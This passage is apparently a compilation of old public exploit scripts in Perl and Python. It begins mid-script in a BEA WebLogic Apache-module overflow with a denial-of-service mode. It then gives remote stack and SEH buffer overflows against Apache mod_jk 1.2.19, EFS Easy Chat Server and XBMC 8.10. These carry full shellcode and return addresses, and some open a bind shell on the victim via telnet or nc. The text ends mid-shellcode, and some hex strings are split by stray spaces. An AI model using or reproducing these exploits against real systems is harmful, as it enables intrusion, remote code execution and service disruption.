print "Usage: perl bea-unlock.pl <hostname or ip> <target>";
print "\n";
printusage:
if ($wrongusage == 1) { exit; }
################################################## ##############################
### Argument Parsing
################################################## ##############################
my $host = $ARGV[0];
my $target = $ARGV[1];
if (($host == "") || ($target == "")) {
$wrongusage = 1;
goto printusage;
}
################################################## ##############################
### Setup Socket
################################################## ##############################
setupsocket:
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $apacheport,
Proto => 'tcp');
if ($dodoshost == 1) {
goto doshost;
}
################################################## ##############################
### Select Target
################################################## ##############################
if ($target == 1) {
print "Exploiting $host -- " . $tgtname[$target-1];
goto winexpl;
}
if ($target == 2) {
print "Attacking Host $host -- Denial of Service -- Wait ...\n";
goto doshost;
}
################################################## ##############################
### Exploitation of Windows Versions
################################################## ##############################
winexpl:
####WORKS [LOOKUP THE HOSTNAME]
my $command = "echo works > c:\\desiredfile.txt";
my $cmds = "cmd.exe /c \"$command\"|";
my $sc = $cmds;
#### STACKBREAKING WITH WINEXEC() ON WINDOWS
my $c = "C" x 97 . pack("L", 0x10013930) x 3 . pack("L", 0x10013930) . pack("L", 0x10013931) . pack("L",0x77EA411E);
my $a = $cmds . "A" x (4000-length($cmds)) . $c;
print $sock "POST /.jsp $a\r\nHost: localhost\r\n\r\n";
while (<$sock>) {
print;
}
################################################## ##############################
### Denial of Service Against The Apache Frontend Module For Bea Weblogic
################################################## ##############################
####NEEDS SOME FIXUP
doshost:
$dodoshost = 1;
while(1) {
$a = "A" x 6000;
goto setupsocket;
print $sock "POST /.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
while(read($sock,$_,100)) {
my $dosagain = 0;
if ($dosagain eq 1) {
"Server is down now\n";
exit;
}
if ($_ =~ /Server/) {
print ".";
$dosagain = 1;
next;
}
}
}
# [2008-07-17]
80 Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
#!/usr/bin/python
#
# _____ _ _ _____ _____ _____ _____
# / ___| |_| | _ \| _ | _ |_ _|
# | (___| _ | [_)_/| (_) | (_) | | |
# \_____|_| |_|_| |_||_____|_____| |_|
# C. H. R. O. O. T. SECURITY GROUP
# - -- ----- --- -- -- ---- --- -- -
# http://www.chroot.org
#
# _ _ _ _____ ____ ____ __ _
# Hacks In Taiwan | |_| | |_ _| __| | \| |
# Conference 2008 | _ | | | | | (__| () | |
# |_| |_|_| |_| \____|____|_|\__|
# http://www.hitcon.org
#
#
# Title =======:: Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit
#
# Author ======:: unohope [at] chroot [dot] org
#
# IRC =========:: irc.chroot.org #chroot
#
# ScriptName ==:: Apache Module mod_jk/1.2.19
#
# Vendor ======:: http://tomcat.apache.org/
#
# Download ====:: http://archive.apache.org/dist/tomcat/tomcat-connectors/jk/binaries/win32/
#
# Tested on ===:: Apache/2.0.58 (Win32) mod_jk/1.2.19
# Apache/2.0.59 (Win32) mod_jk/1.2.19
#
# Greets ======:: zha0
#
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit ([email protected])
#
# usage: ./apx-jk_mod-1.2.19 <host>
#
# [root@wargame tmp]# ./apx-jk_mod-1.2.19 192.168.1.78
# Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit ([email protected])
#
# [+] connecting to 192.168.1.78 ...
#
# Trying 192.168.1.78...
# Connected to 192.168.1.78.
# Escape character is '^]'.
# Microsoft Windows XP [.. 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\AppServ\Apache2>
#
#
import os, sys, time
from socket import *
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x 51\x5a\x6a\x68"
shellcode += "\x58\x30\x41\x31\x50\x42\x41\x6b\x42\x41\x78\x42\x 32\x42\x41\x32"
shellcode += "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4b\x 59\x49\x6c\x43"
shellcode += "\x5a\x7a\x4b\x32\x6d\x5a\x48\x5a\x59\x69\x6f\x4b\x 4f\x39\x6f\x71"
shellcode += "\x70\x6e\x6b\x62\x4c\x44\x64\x71\x34\x4c\x4b\x62\x 65\x75\x6c\x4c"
shellcode += "\x4b\x63\x4c\x76\x65\x70\x78\x35\x51\x48\x6f\x6c\x 4b\x50\x4f\x74"
shellcode += "\x58\x6e\x6b\x33\x6f\x55\x70\x37\x71\x48\x6b\x57\x 39\x6c\x4b\x66"
shellcode += "\x54\x6e\x6b\x46\x61\x7a\x4e\x47\x41\x6b\x70\x7a\x 39\x4c\x6c\x4c"
shellcode += "\x44\x6f\x30\x62\x54\x44\x47\x38\x41\x4b\x7a\x54\x 4d\x44\x41\x4b"
shellcode += "\x72\x78\x6b\x39\x64\x35\x6b\x53\x64\x75\x74\x46\x 48\x72\x55\x79"
shellcode += "\x75\x6c\x4b\x53\x6f\x76\x44\x44\x41\x48\x6b\x35\x 36\x4e\x6b\x54"
shellcode += "\x4c\x30\x4b\x6c\x4b\x51\x4f\x65\x4c\x65\x51\x38\x 6b\x77\x73\x36"
shellcode += "\x4c\x4e\x6b\x6e\x69\x30\x6c\x66\x44\x45\x4c\x30\x 61\x69\x53\x30"
shellcode += "\x31\x79\x4b\x43\x54\x6c\x4b\x63\x73\x44\x70\x4e\x 6b\x77\x30\x66"
shellcode += "\x6c\x6c\x4b\x72\x50\x45\x4c\x4c\x6d\x4e\x6b\x73\x 70\x64\x48\x73"
shellcode += "\x6e\x55\x38\x6e\x6e\x32\x6e\x34\x4e\x58\x6c\x62\x 70\x39\x6f\x6b"
shellcode += "\x66\x70\x66\x61\x43\x52\x46\x71\x78\x30\x33\x55\x 62\x63\x58\x63"
shellcode += "\x47\x34\x33\x65\x62\x41\x4f\x30\x54\x39\x6f\x4a\x 70\x52\x48\x5a"
shellcode += "\x6b\x38\x6d\x6b\x4c\x75\x6b\x30\x50\x6b\x4f\x6e\x 36\x53\x6f\x6f"
shellcode += "\x79\x4a\x45\x32\x46\x6f\x71\x6a\x4d\x34\x48\x77\x 72\x73\x65\x73"
shellcode += "\x5a\x37\x72\x69\x6f\x58\x50\x52\x48\x4e\x39\x76\x 69\x4a\x55\x4c"
shellcode += "\x6d\x32\x77\x69\x6f\x59\x46\x50\x53\x43\x63\x41\x 43\x70\x53\x70"
shellcode += "\x53\x43\x73\x50\x53\x62\x63\x70\x53\x79\x6f\x6a\x 70\x35\x36\x61"
shellcode += "\x78\x71\x32\x78\x38\x71\x76\x30\x53\x4b\x39\x69\x 71\x4d\x45\x33"
shellcode += "\x58\x6c\x64\x47\x6a\x74\x30\x5a\x67\x43\x67\x79\x 6f\x39\x46\x32"
shellcode += "\x4a\x56\x70\x66\x31\x76\x35\x59\x6f\x58\x50\x32\x 48\x4d\x74\x4e"
shellcode += "\x4d\x66\x4e\x7a\x49\x50\x57\x6b\x4f\x6e\x36\x46\x 33\x56\x35\x39"
shellcode += "\x6f\x78\x50\x33\x58\x6b\x55\x51\x59\x4e\x66\x50\x 49\x51\x47\x39"
shellcode += "\x6f\x48\x56\x32\x70\x32\x74\x62\x74\x46\x35\x4b\x 4f\x38\x50\x6e"
shellcode += "\x73\x55\x38\x4d\x37\x71\x69\x69\x56\x71\x69\x61\x 47\x6b\x4f\x6e"
shellcode += "\x36\x36\x35\x79\x6f\x6a\x70\x55\x36\x31\x7a\x71\x 74\x32\x46\x51"
shellcode += "\x78\x52\x43\x70\x6d\x4f\x79\x4d\x35\x72\x4a\x66\x 30\x42\x79\x64"
shellcode += "\x69\x7a\x6c\x4b\x39\x48\x67\x62\x4a\x57\x34\x4f\x 79\x6d\x32\x37"
shellcode += "\x41\x6b\x70\x7a\x53\x6e\x4a\x69\x6e\x32\x62\x46\x 4d\x6b\x4e\x70"
shellcode += "\x42\x44\x6c\x4c\x53\x6e\x6d\x31\x6a\x64\x78\x4c\x 6b\x4e\x4b\x4e"
shellcode += "\x4b\x43\x58\x70\x72\x69\x6e\x6d\x63\x37\x66\x79\x 6f\x63\x45\x73"
shellcode += "\x74\x4b\x4f\x7a\x76\x63\x6b\x31\x47\x72\x72\x41\x 41\x50\x51\x61"
shellcode += "\x41\x70\x6a\x63\x31\x41\x41\x46\x31\x71\x45\x51\x 41\x4b\x4f\x78"
shellcode += "\x50\x52\x48\x4c\x6d\x79\x49\x54\x45\x38\x4e\x53\x 63\x6b\x4f\x6e"
shellcode += "\x36\x30\x6a\x49\x6f\x6b\x4f\x70\x37\x4b\x4f\x4e\x 30\x4e\x6b\x30"
shellcode += "\x57\x69\x6c\x6b\x33\x4b\x74\x62\x44\x79\x6f\x6b\x 66\x66\x32\x6b"
shellcode += "\x4f\x4e\x30\x53\x58\x58\x70\x4e\x6a\x55\x54\x41\x 4f\x52\x73\x4b"
shellcode += "\x4f\x69\x46\x4b\x4f\x6e\x30\x68";
foo_base = 8
buf_base = 4087
buf_offset = foo_base * 11
nop = "\x90"
ret = "\xcc\x2a\xd9\x77"
buf = nop*foo_base + shellcode + nop*(buf_base - foo_base - len(shellcode) - buf_offset) + ret
buf += "\x90\x90\xb0\x53\x6b\xC0\x28\x03\xd8\xff\xd3" + nop*(buf_offset - foo_base - 3)
def usage():
print 'usage: %s <host>\n' % sys.argv[0]
sys.exit(-1)
def xpl():
try:
print len(buf)
sockaddr = (host, 80)
s = socket(AF_INET, SOCK_STREAM)
s.connect(sockaddr)
payload = buf + 'HTTP/1.0\r\nHost: %s\r\n\r\n\0' % host
s.send('GET /' + payload)
s.close()
print ' [+] connecting to %s ...\n' % host
time.sleep(3)
os.system("telnet %s 8888" % host)
except:
print ' [-] EXPLOIT FAILED!\n'
if __name__ == '__main__':
print 'Apache (mod_jk) 1.2.19 Remote Stack Overflow Exploit (unohope [at] chroot.org)\n'
try:
host = sys.argv[1]
except IndexError:
usage()
xpl()
# [NOTE]
#
# !! This is just for educational purposes, DO NOT use for illegal. !!
#
# [2008-07-18]
80 EFS Easy Chat Server Authentication Request BOF Exploit (SEH)
#!/usr/bin/python
# Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
# Refer : http://www.enigmagroup.org/exploits/4289
# Tested on : Xp sp2 (fr)
# Exploited by : His0k4
# Greetings : All friends & muslims HaCkErs (DZ)
import struct
import socket
buf = "\x41"*216
buf += "\xEB\x06\xAE\xFA" #jmp+6
buf += "\xB6\xB2\x01\x10" #universal pop pop ret
buf += "\x90"*19
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf+=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\xa4"
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\x a4\x0d\xa0\xff"
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x 84\x0c\xc0\xf3"
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\x a3\xcc\xe1\xb7"
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x 80\x0c\xc0\xdc"
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x 4f\x84\x77\x9e"
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x 2f\x4d\x27\x31"
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\x a4\x0d\xa0\xd2"
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\x cc\xfd\xa1\xbe"
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\x c7\x0d\x2b\xba")
head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n"
head += "Host: 127.0.0.1\r\n"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "\r\n\r\n")
s.close()
# [2009-03-03]
80 EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)
#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.enigmagroup.org/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[.................................................. ....]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# Sending Diabolic request...
# Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Easy Chat Server>
#
#[.................................................. ....]
#
# Enjoy!
#
use IO::Socket;
print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n";
$host = shift || die "Usage: perl $0 <host>\n";
$junk = "\x90" x 208;
$jmp = "\xEB\x06\xAE\xFA";
$ppr = "\xB6\xB2\x01\x10";
$shellcode = "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x 33\xc9\xb1".
"\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x 9c\x8f\x73".
"\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x 80\x55\x44".
"\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x 65\xb2\x06".
"\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\x a1\x4e\x58".
"\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x 49\x1c\x03".
"\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x 34\xec\x57".
"\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x 5a\xe7\x60".
"\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\x e4\x5d\x7b".
"\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x 74\xf5\xab".
"\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\x ee\xf7\xba".
"\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x 02\xa5\xc7".
"\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\x e7\x84\x9c".
"\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x 80\x5d\x71".
"\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x 07\x99\x07".
"\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x 9e\x96\xa7".
"\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\x ec\xf5\x79".
"\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\x bb\x57\xb3".
"\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x 32\xd9\xff".
"\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x 04\xdc\xbf".
"\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\x c6\x01\x8d".
"\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x 31\x4b\xfd".
"\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\x da\x80\x14";
$buffer = $junk.$jmp.$ppr.$shellcode;
$socket = IO::Socket::INET->new(PeerAddr=> $host,
PeerPort=> '80',
Proto=> 'tcp',
Timeout=>'1') || die "[-] Unable to Connect.!\n";
print " Sending Diabolic request...\n";
print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n";
print $socket "Host: $host\r\n\r\n\r\n";
close($socket);
print " Connecting to bindshell $host:9999\n\n";
system("nc $host 9999");
# [2009-03-04]
80 XBMC 8.10 (Get Request) Remote Buffer Overflow Exploit (win)
#!/usr/bin/env python
'''
Xbmc get request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
Release date:April the 1st 2009
versions affected:
Linux windows < tested
other versions are also possibly affected.
Restrictions:Bad chars need to be filtered.
This exploit happens when parsing and overly long
get request.We can gain control of the $eip register
the next 4bytes of our user supplied data is copied into
$esp register.
The 3 buffer overflows i found in xbmc have nothing in
common they are 3 separate overflow.Please see poc code
for further analysis.
I tried to evade the filtering when passing the shell code
by loading it into the other fields that where available.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
Junk_buffer = 'A'*1010
Jump_esp = struct.pack('<L',0x77F84143)
Shell_code=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x 4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x 46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x 4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x 43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x 42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x 4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x 42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x 4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x 42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x 4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x 43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x 42\x30\x5a"
)
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Junk_buffer + Jump_esp + Shell_code)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-01]
80 XBMC 8.10 (takescreenshot) Remote Buffer Overflow Exploit
#!/usr/bin/env python
'''
Xbmc takescreenshot request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
Release date:April the 1st 2009
versions affected:
Linux windows < tested
other versions are also possibly affected.
Restrictions:No restrictions
This exploit happens when parsing and overly long file name
to the server using the takescreenshot command.
there is a description in the poc code.
When passing this to the http server we can evade url: filtering
as it is passed to the application as an overly long dir.
This means we can use any shell code we wish.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
Start_url ='xbmcCmds/xbmcHttp?command=takescreenshot('
Junk_buffer = 'A'*1036
Jump_esp = struct.pack('<L',0x77F84143)
Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
"\x4e\x36\x46\x32\x46\x32\x4b\x48\x45\x34\x4e\x53\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x 46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x32\x4b\x38"
"\x49\x48\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x 41\x53\x4b\x4d"
"\x46\x46\x4b\x48\x43\x44\x42\x53\x4b\x38\x42\x34\x 4e\x30\x4b\x38"
"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x 50\x45\x4a\x36"
"\x50\x58\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
"\x43\x35\x48\x36\x4a\x46\x43\x33\x44\x53\x4a\x46\x 47\x37\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x 4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x35\x4f\x4f\x48\x4d\x4f\x55\x 49\x38\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x30\x44\x30\x45\x45\x 4c\x36\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x 4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x35\x43\x55\x43\x55\x43\x55\x 43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x56\x 4a\x46\x41\x51"
"\x4e\x45\x48\x36\x43\x35\x49\x58\x41\x4e\x45\x59\x 4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x41"
"\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x 4d\x4a\x50\x52"
"\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x45\x45\x45\x 4f\x4f\x42\x4d"
"\x4a\x46\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
"\x42\x35\x46\x45\x46\x35\x45\x55\x4f\x4f\x42\x4d\x 43\x39\x4a\x46"
"\x47\x4e\x49\x57\x48\x4c\x49\x47\x47\x55\x4f\x4f\x 48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x56\x48\x56\x 4a\x36\x43\x46"
"\x4d\x56\x49\x48\x45\x4e\x4c\x46\x42\x35\x49\x35\x 49\x32\x4e\x4c"
"\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x 41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x 44\x34\x4e\x52"
"\x43\x59\x4d\x48\x4c\x47\x4a\x53\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x54\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x45\x41\x55\x41\x35\x 41\x45\x4c\x36"
"\x41\x30\x41\x55\x41\x35\x45\x45\x41\x35\x4f\x4f\x 42\x4d\x4a\x56"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x 47\x55\x4e\x4f"
"\x43\x48\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x 4f\x4f\x42\x4d"
"\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x 4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"
)
End_url ='.jpg;false;0;300;200;90)'
# create a socket object called 'c'
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# connect to the socket
c.connect((host, port))
Request = (Start_url + Junk_buffer + Jump_esp + Shell_code + End_url)
# create a file-like object to read
fileobj = c.makefile('r', 0)
# Ask the server for the file
fileobj.write("GET /"+Request+" HTTP/1.1\n\n")
# [2009-04-01]
80 XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit
#!/usr/bin/env python
'''
Xbmc get tag from file name request remote buffer overflow 8.10 !!!
Tested:Win xp sp2 eng
Vendor url:http://xbmc.org/
versions affected:
Linux windows < tested
other versions are also possibly affected.
Release date:April the 1st 2009
Restrictions:No filtering needed.
This exploit happens when parsing and overly long id3
tag to the web server.Dont think i covered this much
in the poc code as i was running out of time on this
exploit.
We are able to overwrite the exception handlers also so
creating a reliable exploit for vista and xps3 shouldn't
be to hard have a look there are some modules loaded with
out /safe seh.
Credits to n00b for finding the buffer overflow and writing
poc code and exploit.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
'''
import sys, socket
import struct
port = 80
host = sys.argv[1]
Start_url ='xbmcCmds/xbmcHttp?command=GetTagFromFilename(C:/'
Junk_buffer = 'A'*1033
Jump_esp = struct.pack('<L',0x77F84143)
Shell_code=(#win32_bind -EXITFUNC=seh LPORT=4444 http://metasploit.com */
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
"\x4e\x36\x46\x32\x46\x32\x4b\x48\x45\x34\x4e\x53\x 4b\x58\x4e\x37"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x 4a\x51\x4b\x58"
"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x 46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x 46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x 44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x47\x 45\x4e\x4b\x48"
"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x 4e\x50\x4b\x54"
"\x4b\x48\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x 4e\x32\x4b\x38"
"\x49\x48\x4e\x36\x46\x32\x4e\x31\x41\x36\x43\x4c\x 41\x53\x4b\x4d"
